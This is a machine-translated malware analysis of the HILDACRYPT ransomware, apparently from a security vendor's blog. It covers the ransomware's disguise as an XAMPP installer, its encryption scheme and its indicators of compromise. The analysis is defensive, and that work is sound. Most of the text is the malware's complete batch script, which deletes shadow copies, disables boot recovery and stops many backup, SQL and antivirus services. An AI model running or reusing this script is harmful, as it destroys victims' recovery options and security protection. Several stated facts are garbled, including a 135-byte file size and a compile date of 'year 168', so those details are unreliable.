Salam, Habr! Yenə də biz Ransomware kateqoriyasından olan zərərli proqramların ən son versiyalarından danışırıq. HILDACRYPT, 2019-cu ilin avqustunda kəşf edilmiş Hilda ailəsinin üzvü olan, proqramı yaymaq üçün istifadə edilən Netflix cizgi filminin adını daşıyan yeni bir fidyə proqramıdır. Bu gün biz bu yenilənmiş ransomware virusunun texniki xüsusiyyətləri ilə tanış oluruq.
Hilda ransomware proqramının ilk versiyasında Youtube-da birinə keçid yerləşdirilib fidyə məktubunda cizgi filmi seriyası var idi. HILDACRYPT qanuni XAMPP quraşdırıcısı, MariaDB, PHP və Perl daxil olmaqla quraşdırılması asan Apache paylanması kimi maskalanır. Eyni zamanda, kriptolokerin fərqli bir fayl adı var - xamp. Bundan əlavə, ransomware faylının elektron imzası yoxdur.
Statik analiz
Ransomware MS Windows üçün yazılmış PE32 .NET faylındadır. Onun ölçüsü 135 baytdır. Həm əsas proqram kodu, həm də müdafiəçi proqram kodu C# dilində yazılmışdır. Tərtib tarixi və vaxt möhürünə görə, binar 168 sentyabr 14-cu ildə yaradılmışdır.
Detect It Easy-ə görə, ransomware Confuser və ConfuserEx-dən istifadə etməklə arxivləşdirilir, lakin bu obfuscatorlar əvvəlki kimidir, yalnız ConfuserEx Confuser-in davamçısıdır, ona görə də onların kod imzaları oxşardır.
HILDACRYPT həqiqətən ConfuserEx ilə paketlənmişdir.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Hücum vektoru
Çox güman ki, ransomware qanuni XAMPP proqramı kimi maskalanan veb proqramlaşdırma saytlarından birində aşkar edilib.
Bütün infeksiya zəncirində görünə bilər .
Qarışıqlıq
Ransomware sətirləri şifrələnmiş formada saxlanılır. HILDACRYPT işə salındıqda onları Base64 və AES-256-CBC istifadə edərək deşifrə edir.
Quraşdırma
Əvvəla, ransomware %AppDataRoaming%-də GUID (Qlobal Unikal İdentifikator) parametrinin təsadüfi yaradıldığı qovluq yaradır. Bu yerə yarasa faylı əlavə etməklə, ransomware virusu cmd.exe faylından istifadə edərək onu işə salır:
cmd.exe /c JKfgkgj3hjgfhjka.bat və çıxın
Daha sonra sistem xüsusiyyətlərini və ya xidmətlərini söndürmək üçün toplu skripti icra etməyə başlayır.
Skript kölgə nüsxələrini məhv edən, SQL serverini, ehtiyat nüsxəsini və antivirus həllərini söndürən əmrlərin uzun bir siyahısını ehtiva edir.
Məsələn, Acronis Backup xidmətlərini dayandırmağa uğursuz cəhd edir. Bundan əlavə, o, aşağıdakı təchizatçıların ehtiyat sistemlərinə və antivirus həllərinə hücum edir: Veeam, Sophos, Kaspersky, McAfee və başqaları.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Yuxarıda qeyd olunan xidmətlər və proseslər söndürüldükdən sonra kriptolocker bütün lazımi xidmətlərin dayandırılmasını təmin etmək üçün tapşırıq siyahısı əmrindən istifadə edərək bütün işləyən proseslər haqqında məlumat toplayır.
tapşırıq siyahısı v/fo csv
Bu əmr elementləri “,” işarəsi ilə ayrılmış işləyən proseslərin ətraflı siyahısını göstərir.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Bu yoxlamadan sonra ransomware şifrələmə prosesinə başlayır.
Şifrələmə
Fayl şifrələməsi
HILDACRYPT Recycle.Bin və Reference AssembliesMicrosoft qovluqları istisna olmaqla, sabit disklərin bütün tapılmış məzmunundan keçir. Sonuncu, ransomware proqramının işinə təsir göstərə bilən .Net proqramları üçün kritik dll, pdb və s. faylları ehtiva edir. Şifrələnəcək faylları axtarmaq üçün aşağıdakı uzantıların siyahısı istifadə olunur:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware istifadəçi fayllarını şifrələmək üçün AES-256-CBC alqoritmindən istifadə edir. Açarın ölçüsü 256 bit və başlanğıc vektorunun (IV) ölçüsü 16 baytdır.
Aşağıdakı ekran görüntüsündə byte_2 və byte_1 dəyərləri GetBytes() istifadə edərək təsadüfi olaraq əldə edilmişdir.
Açar
VƏ
Şifrələnmiş faylın HCY uzantısı var!.. Bu, şifrələnmiş faylın nümunəsidir. Yuxarıda qeyd olunan açar və IV bu fayl üçün yaradılmışdır.
Açar şifrələməsi
Kriptolocker yaradılan AES açarını şifrələnmiş faylda saxlayır. Şifrələnmiş faylın birinci hissəsində XML formatında HILDACRYPT, KEY, IV, FileLen kimi məlumatları ehtiva edən başlıq var və belə görünür:
AES və IV açar şifrələməsi RSA-2048, kodlaşdırma isə Base64 istifadə edərək həyata keçirilir. RSA açıq açarı kriptolockerin gövdəsində XML formatında şifrələnmiş sətirlərdən birində saxlanılır.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
AES fayl açarını şifrələmək üçün RSA açıq açarı istifadə olunur. RSA açıq açarı Base64 kodludur və moduldan və 65537 ictimai eksponentindən ibarətdir. Şifrənin açılması təcavüzkarın malik olduğu RSA özəl açarını tələb edir.
RSA şifrələməsindən sonra AES açarı şifrələnmiş faylda saxlanılan Base64 istifadə edərək kodlanır.
Fidyə mesajı
Şifrələmə tamamlandıqdan sonra HILDACRYPT html faylını faylları şifrələdiyi qovluğa yazır. Ransomware bildirişində qurbanın təcavüzkarla əlaqə saxlaya biləcəyi iki e-poçt ünvanı var.
Qəsb bildirişində həmçinin “No loli təhlükəsizdir;)” sətri var - Yaponiyada qadağan olunmuş kiçik qızların görünüşü ilə anime və manqa personajlarına istinad.
Buraxılış
Yeni ransomware ailəsi olan HILDACRYPT yeni versiyasını buraxdı. Şifrələmə modeli qurbanın ransomware tərəfindən şifrələnmiş faylları deşifrə etməsinin qarşısını alır. Cryptolocker ehtiyat nüsxə sistemləri və antivirus həlləri ilə bağlı mühafizə xidmətlərini deaktiv etmək üçün aktiv mühafizə üsullarından istifadə edir. HILDACRYPT-in müəllifi Netflix-də nümayiş etdirilən Hilda cizgi serialının pərəstişkarıdır, treylerine keçid proqramın əvvəlki versiyası üçün satınalma məktubunda yer alır.
Həmişəki kimi, и kompüterinizi HILDACRYPT ransomware-dən qoruya bilər və provayderlər öz müştərilərini qorumaq imkanına malikdirlər. . Qoruma bu həllərin daxil olması ilə təmin edilir təkcə ehtiyat nüsxəni deyil, həm də inteqrasiya olunmuş təhlükəsizlik sistemimizi əhatə edir - Maşın öyrənmə modeli ilə təchiz edilmiş və davranış evristikaya əsaslanan, sıfır günlük ransomware təhlükəsinə qarşı durmağa qadir olan texnologiya.
Güzəşt göstəriciləri
Fayl uzantısı HCY!
HILDACRYPTReadMe.html
xamp.exe bir "p" hərfi ilə və rəqəmsal imza yoxdur
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Mənbə: www.habr.com